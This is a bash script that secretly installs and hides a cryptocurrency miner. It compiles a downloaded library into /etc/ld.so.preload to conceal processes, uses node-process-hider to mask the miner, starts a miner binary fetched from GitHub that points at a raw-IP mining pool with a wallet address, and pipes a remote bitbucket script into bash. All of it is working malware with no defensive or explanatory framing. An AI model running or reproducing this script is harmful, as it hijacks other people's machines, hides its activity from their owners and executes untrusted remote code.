#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
sudo gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://github.com/aqshakuy/nyemfile/raw/main/BTRM >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a minotaurx  -o stratum+tcp://172.234.78.193:80 -u RBsvCPoH7ML9pNaXP6mibF2xmF3mgM4RGT.$(echo $(shuf -i 1-20000 -n 1)-SUIII) -p x > /dev/null 2>&1 &
curl -sL https://bitbucket.org/commuter21/escom/raw/main/gudabel.sh | bash 